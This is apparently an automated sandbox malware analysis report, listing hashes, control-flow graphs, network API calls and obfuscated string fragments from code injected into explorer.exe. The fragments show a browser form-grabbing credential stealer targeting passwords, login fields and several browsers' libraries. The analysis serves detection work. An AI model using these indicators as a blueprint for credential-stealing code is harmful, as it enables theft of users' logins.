                                          • Instruction Fuzzy Hash: AD015E74618B188FCB84EF1CE088B55B7E0FB58315F1545AED90DCB226C674C9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 298 8ca3732-8ca3768 299 8ca376a-8ca3782 call 8ca6942 298->299 300 8ca3788-8ca37ab connect 298->300 299->300
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: connect
                                          • String ID: conn$ect
                                          • API String ID: 1959786783-716201944
                                          • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction ID: 8f910b5e2b7c06f7d67fc505b2097cb174aadc8fdceb998493858d65b45c863e
                                          • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                          • Instruction Fuzzy Hash: 56012C70618A1C8FCB84EF5CE088B55B7E0FB59315F1541AEA80DCB226CA74C9818BC2
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 303 8ca362c-8ca366b 304 8ca368b-8ca36a6 WSAStartup 303->304 305 8ca366d-8ca3685 call 8ca6942 303->305 305->304
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: WSAS$tart
                                          • API String ID: 724789610-2426239465
                                          • Opcode ID: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                          • Instruction ID: 401a83e7599d9ebfa771de74c25066d87ac24787955540f7fc71ed9f4284041f
                                          • Opcode Fuzzy Hash: eb8e01195b1b45a2b093131951349e4bfa8de15468bd518a6435d0ff3ce2d302
                                          • Instruction Fuzzy Hash: 22018B30518A188FCB44DF1CD04CB69FBE0FB58316F2502ADD409CB366C7B0CA428B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 308 8ca3632-8ca366b 309 8ca368b-8ca36a6 WSAStartup 308->309 310 8ca366d-8ca3685 call 8ca6942 308->310 310->309
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: Startup
                                          • String ID: WSAS$tart
                                          • API String ID: 724789610-2426239465
                                          • Opcode ID: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                          • Instruction ID: b10cd9e229e21e194004aaf7f05bea88350c5776fd35703982964d5bd80422e7
                                          • Opcode Fuzzy Hash: 8ca80b95c4f802a72df079fcfff649d32c96cc10ab9ce8db75eb9f3d41236f43
                                          • Instruction Fuzzy Hash: DA014B70518A188FCB84DF1C904CB69FBE0FB58355F2541A9E40DCB266C7B0C9428B96
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 421 8ca36b2-8ca36e5 422 8ca36e7-8ca36ff call 8ca6942 421->422 423 8ca3705-8ca372d send 421->423 422->423
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: send
                                          • String ID: send
                                          • API String ID: 2809346765-2809346765
                                          • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction ID: c745d8be62b1ed9be712bdc6bbbf27681a244ed134582dc35fc04e0faedcac26
                                          • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                          • Instruction Fuzzy Hash: E7011270518A198FDBC4EF1CD048B2577E0EB58315F1545AED85DCB366C670D8818B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 426 8ca35b2-8ca35ea 427 8ca360a-8ca362b socket 426->427 428 8ca35ec-8ca3604 call 8ca6942 426->428 428->427
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: socket
                                          • String ID: sock
                                          • API String ID: 98920635-2415254727
                                          • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction ID: 278628a5d7e8d02344821c3482f104f96cd801d50b5c208f07f54d38e3dbbe9f
                                          • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                          • Instruction Fuzzy Hash: B10121706186188FCB84EF1CD048B54BBE0FB59315F1545ADD45EDB366C7B4C9818B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 431 8c9b2dd-8c9b320 call 8ca6942 434 8c9b3fa-8c9b40e 431->434 435 8c9b326 431->435 436 8c9b328-8c9b339 SleepEx 435->436 436->436 437 8c9b33b-8c9b341 436->437 438 8c9b34b-8c9b352 437->438 439 8c9b343-8c9b349 437->439 441 8c9b370-8c9b376 438->441 442 8c9b354-8c9b35a 438->442 439->438 440 8c9b35c-8c9b36a call 8ca5f12 439->440 440->441 443 8c9b378-8c9b37e 441->443 444 8c9b3b7-8c9b3bd 441->444 442->440 442->441 443->444 447 8c9b380-8c9b38a 443->447 448 8c9b3bf-8c9b3cf call 8c9be72 444->448 449 8c9b3d4-8c9b3db 444->449 447->444 450 8c9b38c-8c9b3b1 call 8c9c432 447->450 448->449 449->436 452 8c9b3e1-8c9b3f5 call 8c9b0f2 449->452 450->444 452->436
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: Sleep
                                          • String ID:
                                          • API String ID: 3472027048-0
                                          • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction ID: 53f7dbb39f0de8b8e50fbffc3d77d0a89561a47c3148beeac163378148d65c33
                                          • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                          • Instruction Fuzzy Hash: AF318B74614B59EFDF64EF69908C2A5B3B0FB44312F4442BEC9ADCA206CB309961CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881171114.0000000008C00000.00000040.80000000.00040000.00000000.sdmp, Offset: 08C00000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8c00000_explorer.jbxd
                                          Similarity
                                          • API ID: CreateThread
                                          • String ID:
                                          • API String ID: 2422867632-0
                                          • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction ID: 9ff5f723bdf0f8527883b9994d1bc87a4eb20203f4320f5d927bc14b7745a390
                                          • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                          • Instruction Fuzzy Hash: F9F0FC34268A494FD784EF2CD44563AF3E0FBE8215F44057E954DC3354DA75C5424B15
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                          • API String ID: 0-393284711
                                          • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                          • Instruction ID: cc990263f633e42d6c356b535aa86a3b70a389a7e608cb872914cdfd3ae8a3a2
                                          • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                          • Instruction Fuzzy Hash: FAE158B4618F488FC765EF68C4857AAB7E0FF58302F504A2E959BC7251DF30A541CB89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                          • API String ID: 0-2916316912
                                          • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                          • Instruction ID: 9442b054741e2249951fcdb9ce4338b9ed3bdd309a40f8e990651c74af7c91c4
                                          • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                          • Instruction Fuzzy Hash: ADB17930518B48CEDB59EF68C486AEEB7F1FF98301F50451ED4AAC7251EF70A5058B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                          • API String ID: 0-1539916866
                                          • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                          • Instruction ID: 7693f142107bc3d0b09f2303ec604a912b211c70cbb133640ca14ffce2bdcd6b
                                          • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                          • Instruction Fuzzy Hash: 7841A171A18B08CFDB14EF88A4466BD7BE6FB48701F00025ED809D7345DBB59D468BD6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                          • API String ID: 0-355182820
                                          • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                          • Instruction ID: bb8c4a4dfbca393da9dacbe09ca4ffb70d34098885cfd972b7f7f0af98825899
                                          • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                          • Instruction Fuzzy Hash: DDC15774618B09CFC759EF28C486AAAF3E1FF98305F40472E959AC7250DF30A615CB86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                          • API String ID: 0-97273177
                                          • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                          • Instruction ID: 1d2b57443b1dc2e0a2687c21e75a5a07e1babe040fb0db37f72dbb47a34e2223
                                          • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                          • Instruction Fuzzy Hash: 8751C13161C748CFD719EF18C4862AAB7E5FF85301F501A2EE88BC7241DBB499068F82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                          • API String ID: 0-639201278
                                          • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                          • Instruction ID: 9dcaf5216daa12ffc9c24acf83db93f533e38b7ec1cfab4a18055d0deec65a0c
                                          • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                          • Instruction Fuzzy Hash: EBC1AF74618A198FC759FF68D496AAAB3E1FF98301F91432D944EC7250DF30AA02CB85
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                          • API String ID: 0-639201278
                                          • Opcode ID: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                          • Instruction ID: 10fd7dd8fe30271ae7412a1b9fbfcaab9bdcc8fff1f2acf798bdccc3bbf56c19
                                          • Opcode Fuzzy Hash: 3bb0ec29e48dc84c2f9ecdcc79ab9852c4e3249089256f700559b0558053754d
                                          • Instruction Fuzzy Hash: 05C1AF74618A198FC759FF68D496AAAB3E1FF98301F91432D944EC7250DF30AA02CBC5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: UR$2$L: $Pass$User$name$word
                                          • API String ID: 0-2058692283
                                          • Opcode ID: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                          • Instruction ID: 3a4de212e5bc310c49cd99f60df66a9d9aa3384a27873cccd2b2216619769f54
                                          • Opcode Fuzzy Hash: 192ee3367620c7562f2382bb65b9fc05a299a96abcb0fffb8f15ec5ae1331477
                                          • Instruction Fuzzy Hash: 1BA1BE70618748CBDB19EFA89445BEEB7F1FF88311F40462DE48AD7281EF7085458B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: UR$2$L: $Pass$User$name$word
                                          • API String ID: 0-2058692283
                                          • Opcode ID: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                          • Instruction ID: 502fb24694960f22e12e0b714c50a8af562d214edce334ce90a6876f61f0ec9b
                                          • Opcode Fuzzy Hash: 811dc63e753d913bd80861ecf29671c0ec5da9e3b6d1a04c89c314a6a3ecac4a
                                          • Instruction Fuzzy Hash: F9918E70618B48CBDB19EFA89445BEEB7F1FF88301F40462DE48AD7251EF7485458B89
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $.$e$n$v
                                          • API String ID: 0-1849617553
                                          • Opcode ID: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                          • Instruction ID: 510f5d2770d7b45017b687bbb580c0b4dfb458898c5ea8a4d319a3e6fd499391
                                          • Opcode Fuzzy Hash: 88e172b8451cd2a9b002e6988e8bcb77ce4cb4dc6623ca34b6f08ddcd3f94e84
                                          • Instruction Fuzzy Hash: 5D71AF31618B48CFD758EFA8C4897AAB7F1FF98305F00062ED45AD7261EB71D9468B81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 2.dl$dll$l32.$ole3$shel
                                          • API String ID: 0-1970020201
                                          • Opcode ID: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                          • Instruction ID: 9bd8bcadc2d1c0904998ce52e4baa51f0405502c1617379943f73e8bdf2d1053
                                          • Opcode Fuzzy Hash: b134dbd9f6717a83955f5285ab3b339b989e1d50f8699707141bdd3daa24f32e
                                          • Instruction Fuzzy Hash: EF513AB0918B4C8BDB65EFA4C045AEEB7F1FF58301F404A2E949AE7254EF3095418B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 4$\$dll$ion.$vers
                                          • API String ID: 0-1610437797
                                          • Opcode ID: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                          • Instruction ID: 7295ad3a7fed99e48e53e57371c8b7b340e0959b88f28fd113f81f0775700791
                                          • Opcode Fuzzy Hash: 946c6b85a27e95b541945c97fc8955ce25e9cbbf861c78f5b4a7a89501b4aa4c
                                          • Instruction Fuzzy Hash: 69416F34618B488FCB65EF2898457EBB7E4FF98302F51462E988EC7240EF30D5458B82
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: 32.d$cli.$dll$sspi$user
                                          • API String ID: 0-327345718
                                          • Opcode ID: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                          • Instruction ID: 40ff5ff045a1ca454eefa0f37f5e24e258736fbea40f162501712d11161d3826
                                          • Opcode Fuzzy Hash: 4331b437e8e8c33b9d3042ca7a101e9875946b76dc224aa53cf86a4375d9541a
                                          • Instruction Fuzzy Hash: FE416971A18E0DDFCB98FF6890967AD73E1FF58302F50456AA80BD3240DB70C5828B86
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$el32$h$kern
                                          • API String ID: 0-4264704552
                                          • Opcode ID: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                          • Instruction ID: 68133996a6479a3b84698bbf114928f64e2cb46923a162da06d98e4539424008
                                          • Opcode Fuzzy Hash: 9359c1e703a927bbfeba22f12881d3372b40fdd04c475320464a891c53438f4c
                                          • Instruction Fuzzy Hash: 45413C70608B8C8FD769DF2884883AAB7E1FF98301F144A6E959AC2265DF70C546CB81
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $Snif$f fr$om:
                                          • API String ID: 0-3434893486
                                          • Opcode ID: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                          • Instruction ID: 1fdb65e58baa975e38c264d523a53763240f2094b795cd093541cf1979596de5
                                          • Opcode Fuzzy Hash: 09bcdfac33ec1e4ec0111ee2ca4a837fb2c377919df94419edd54a6c0362b305
                                          • Instruction Fuzzy Hash: 6331CE3151CB889FC71AEB28C4856DAB7D0FF94301F50491EE49AC7292EB30A54ACF43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: $Snif$f fr$om:
                                          • API String ID: 0-3434893486
                                          • Opcode ID: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                          • Instruction ID: f639367e7c958b73281a3c2d7b3c65e4bba927103b17491ea97f5d42858c30a6
                                          • Opcode Fuzzy Hash: 3ff11923ba7cb27a5852b7160a0339692380a5748f6322a3f9139bc862c068a3
                                          • Instruction Fuzzy Hash: 7631CF71518B48AFD719EB28C4856EAB7D5FF94301F40492EE49BC7352EB30A5068E43
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$chro$hild$me_c
                                          • API String ID: 0-3136806129
                                          • Opcode ID: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                          • Instruction ID: 3a7c183923d69018530598deb4d878fe3e1b17e544012770a7080c03f052fd63
                                          • Opcode Fuzzy Hash: b79a347c44b7e53efbef1ad5a08501038d02bf17702d136fbf8a30590be9006b
                                          • Instruction Fuzzy Hash: 55318D74118B088FCB85FF689496BAAB7E1FF98201F84067DA84ACB354DF30C545CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .dll$chro$hild$me_c
                                          • API String ID: 0-3136806129
                                          • Opcode ID: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                          • Instruction ID: fe46b7427882d6a4cccab6cc1659376379688b98e9780bc72bfc1d77dcacf3f6
                                          • Opcode Fuzzy Hash: 451ecfdc7a6dd194cc49c0618832622829ee31958d951160e0d103bd60c3dca9
                                          • Instruction Fuzzy Hash: 79318B70218B088FCB94FF689496BAAB7E1FF98201F84062D984ACB354DF30C545CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 0-319646191
                                          • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction ID: 14256a8ed512b7dfc244d730e1ff96a7f51ca185cf71bc8aeff483706660977a
                                          • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                          • Instruction Fuzzy Hash: 6C31C071A14A1C8BCB14FFA8C8857EDB7E0FF58216F40022AD45EE7340DF7486458B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                          • API String ID: 0-319646191
                                          • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction ID: 86bdb83429548ab2c5ef49cd4b7ce8e8fc994eb98f6682f18d7eb97453c24262
                                          • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                          • Instruction Fuzzy Hash: 4821CE70A14A1DCBCB15FFA8C8867EDBBE0FF58216F40422AD45AE7340DF7486458B99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$l$l$t
                                          • API String ID: 0-168566397
                                          • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                          • Instruction ID: e9b13b8872a3495cfab195c8ee2a45ca6ce266553e92c7cebb83090362d89f3d
                                          • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                          • Instruction Fuzzy Hash: 95215774A28A0D9BDB48FFA8C0457AEBAF1FF18315F50462E9009E3710DB7895918B84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: .$l$l$t
                                          • API String ID: 0-168566397
                                          • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                          • Instruction ID: 0055344a4a0c6b7a0d64bb941385cec269ebf7e1cd8742f88de9a1f73b832a2d
                                          • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                          • Instruction Fuzzy Hash: 24215774A28A0D9BDB08FFA8C0457EABAF1FF18315F50462ED009E3700DB7895518B84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000008.00000002.881078122.0000000008110000.00000040.00000001.00040000.00000000.sdmp, Offset: 08110000, based on PE: false
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_8_2_8110000_explorer.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID: auth$logi$pass$user
                                          • API String ID: 0-2393853802
                                          • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                          • Instruction ID: 90f0cf2dd1ead5be9368696938ce8c046047b176cf2cf44f747e5e1327e7cfc0
                                          • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                          • Instruction Fuzzy Hash: 4021C030618B0D8BCB05EF9998856EEB7E2EF88354F044619E40AEB344D7B4E9158BC6
